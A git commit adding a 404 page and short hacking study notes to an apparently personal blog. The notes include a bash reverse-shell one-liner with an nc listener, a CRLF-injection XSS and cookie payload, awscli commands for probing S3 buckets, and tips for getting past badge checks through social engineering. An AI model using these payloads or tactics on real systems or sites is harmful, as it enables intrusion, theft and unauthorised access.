test custom 404
This commit is contained in:
parent
321024f22f
commit
f0d74bda0e
23
content/404.md
Normal file
23
content/404.md
Normal file
@ -0,0 +1,23 @@
|
||||
---
|
||||
title: "[Error 404](/)"
|
||||
hidden: true
|
||||
noindex: true
|
||||
layout: page
|
||||
---
|
||||
|
||||
Hi! Sorry but link doesn't exist yet.
|
||||
|
||||
![](https://media1.tenor.com/m/3rAtEcJ09BcAAAAC/cat-loading.gif)
|
||||
|
||||
<!-- TODO download, upscale, host here - https://tenor.com/view/cat-loading-error-gif-19814836-->
|
||||
|
||||
It may be still in work or not posted yet.
|
||||
|
||||
If this link doesn't work for 1+ weeks, please contact me!
|
||||
|
||||
<!-- -->
|
||||
<!-- -->
|
||||
<!-- -->
|
||||
<!-- [Take me home!](/) -->
|
||||
|
||||
<!-- thanks https://moonbooth.com/hugo/custom-404/ for guide -->
|
9
content/hacking/HowTo_Bash_reverseShell.md
Normal file
9
content/hacking/HowTo_Bash_reverseShell.md
Normal file
@ -0,0 +1,9 @@
|
||||
+++
|
||||
title = 'HowTo Bash ReverseShell'
|
||||
date = 2024-09-04
|
||||
+++
|
||||
|
||||
Listener - `nc -l 8081`
|
||||
Reverse shell - `bash -i >& /dev/tcp/<YOUR_IP_ADDRESS>/1337 0>&1`
|
||||
|
||||
May not work on hardened systems/containers.
|
26
content/hacking/HowTo_CRLF.md
Normal file
26
content/hacking/HowTo_CRLF.md
Normal file
@ -0,0 +1,26 @@
|
||||
+++
|
||||
title = 'HowTo CRLF'
|
||||
date = 2024-09-18
|
||||
+++
|
||||
|
||||
|
||||
Mostly fixed thing! May occure in some handwritten web-servers<!--more-->
|
||||
|
||||
CRLF - Carriege Return (\r) Line Feed (\n) (or %0d %0a)
|
||||
|
||||
|
||||
|
||||
Inserting \r\n into URL allow attacker to:
|
||||
- log splitting - to insert logs to server that may decieve administrator
|
||||
- HTTP response slpitting - Allows to add HTTP headers to the HTTP response <!-- TODO how does it work? -->
|
||||
- XSS - `www.target.com/%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E` - disables XSS protection, set location to custom (but does it work without 302/201 status???), sets html content-type and injects javascript.
|
||||
- cookie injection
|
||||
- check another note
|
||||
|
||||
For example:
|
||||
`GET /%0d%0aSet-Cookie:CRLFInjection=PreritPathak HTTP/1.1`
|
||||
Will add `Set-Cookie:CRLFInjection=PreritPathak` header to HTTP response
|
||||
|
||||
{{< source >}}
|
||||
https://www.geeksforgeeks.org/crlf-injection-attack/
|
||||
{{< /source >}}
|
84
content/hacking/HowTo_S3.md
Normal file
84
content/hacking/HowTo_S3.md
Normal file
@ -0,0 +1,84 @@
|
||||
+++
|
||||
title = 'HowTo hack S3'
|
||||
date = 2024-09-25
|
||||
draft = true
|
||||
+++
|
||||
|
||||
TODO ME
|
||||
|
||||
## What is S3?
|
||||
|
||||
### Abstract
|
||||
|
||||
S3 (Amazon Simple Storage Service) - object storage. You can think of it as cloud storage but designed for **storing and retrieving large files**. E.g. backups, archives, big data analytics, content distribution, and static website content.
|
||||
|
||||
S3 can be selfhosted (but you probably shouldn't do it). In other cases, company probably will use Amazon's S3.
|
||||
|
||||
S3 have "buckets" - container/folder for files.
|
||||
|
||||
### Technical
|
||||
|
||||
Interaction with S3 happens via RESTful API (`aws s3`).
|
||||
|
||||
Each bucket have its own settings:
|
||||
- Region - each bucket is created in specific AWS region (for performance) - e.g. `https://<bucket-name>.s3.<region>.amazonaws.com/image.png`
|
||||
- Name - each name should be unique across all AWS regions
|
||||
- Storage class - how fast data can be accessed
|
||||
- Lifecycle management - data can automatically be deleted or transfered to cheaper storage
|
||||
- Versioning - S3 can keep snapshots of data
|
||||
- Logging/monitoring
|
||||
- Access control - the most interesting part for us. S3 have **public** and **private** buckets:
|
||||
- In public bucket - any user can list content
|
||||
- In private bucket - you should have credentials which have access to specific file
|
||||
|
||||
|
||||
## Recon
|
||||
|
||||
### Find bucket endpoint
|
||||
|
||||
1. Try [Wappalyzer](https://www.wappalyzer.com/apps/)
|
||||
2. [Spider](/hidden/todo/) site - `katana -js`
|
||||
3. Search
|
||||
|
||||
### Find credentials
|
||||
|
||||
## Enumerate
|
||||
|
||||
Automatically:
|
||||
https://github.com/sa7mon/S3Scanner
|
||||
|
||||
## Manually connect to S3
|
||||
|
||||
awscli:
|
||||
```
|
||||
aws configure
|
||||
*написать что либо, в идеале легальный логин и пароль*
|
||||
aws --endpoint=http://s3.smth.com s3 ls # list buckets
|
||||
aws --endpoint=http://s3.smth.com s3 ls s3://smth # list files
|
||||
aws s3 ls s3://whateverbucketname
|
||||
aws --endpoint=http://s3.smth.com s3 cp smth s3://smth # upload
|
||||
aws s3 mv Exploit.txt s3://whateverbucketname/
|
||||
aws --endpoint=http://s3.smth.com s3 cp s3://smth # download
|
||||
aws s3 cp s3://whateverbucketname/secret.txt
|
||||
```
|
||||
|
||||
|
||||
## Resources
|
||||
|
||||
- https://buckets.grayhatwarfare.com, a list with already discovered open buckets.
|
||||
|
||||
## Train
|
||||
|
||||
- http://flaws.cloud/
|
||||
|
||||
- http://flaws2.cloud/
|
||||
|
||||
{{< source >}}
|
||||
https://book.hacktricks.xyz/generic-methodologies-and-resources/external-recon-methodology#looking-for-vulnerabilities-2
|
||||
https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence
|
||||
https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum
|
||||
https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum
|
||||
https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum
|
||||
https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-unauthenticated-enum-access#s3-buckets
|
||||
https://freedium.cfd/https//medium.com/m/global-identity-2?redirectUrl=https%3A%2F%2Finfosecwriteups.com%2Ffinding-and-exploiting-s3-amazon-buckets-for-bug-bounties-6b782872a6c4
|
||||
{{< /source >}}
|
32
content/hacking/HowTo_learn_SocialEngineering.md
Normal file
32
content/hacking/HowTo_learn_SocialEngineering.md
Normal file
@ -0,0 +1,32 @@
|
||||
+++
|
||||
title = 'HowTo learn Social Engineering'
|
||||
date = 2024-09-11
|
||||
+++
|
||||
|
||||
<!-- TODO xkcd meme -->
|
||||
|
||||
Social Engineering - its **Social** skills + Events **Engineering**<!--more-->
|
||||
|
||||
How to learn Social Engineering:
|
||||
- Create new __Identity__ - "Today I will be Jack the electrician"
|
||||
- Just start interact with **all** people
|
||||
- Don't start speaking with same route: "Hello, I'm Jack, Who are you", do it differently every time
|
||||
- Go pick up girls ~~and touch grass~~
|
||||
- Especially speak with people you are uncomfortable with
|
||||
- You need to have uncomfortable situations to master you being in stressful situations
|
||||
- If they invite you to something weird that you usually don't want to do - Do it
|
||||
- If you have to present something as a proof of your belonging in place where you shouldn't be - Don't show it.
|
||||
|
||||
|
||||
Make your work office - penetretion testing lab
|
||||
- Is there bage required? - Do not wear it and make some excuse. Talk your way out
|
||||
|
||||
|
||||
Books for Social skill:
|
||||
- "Built for Growth" - Chris Kuenne,
|
||||
- "Coaching Habit" - Michael Stanier Bungay
|
||||
|
||||
|
||||
{{< source >}}
|
||||
https://www.youtube.com/watch?v=CldNso156QY
|
||||
{{< /source >}}
|
Loading…
Reference in New Issue
Block a user